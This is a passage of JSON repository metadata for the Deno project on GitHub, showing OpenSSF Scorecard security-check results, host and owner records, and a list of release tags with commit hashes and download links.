https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.g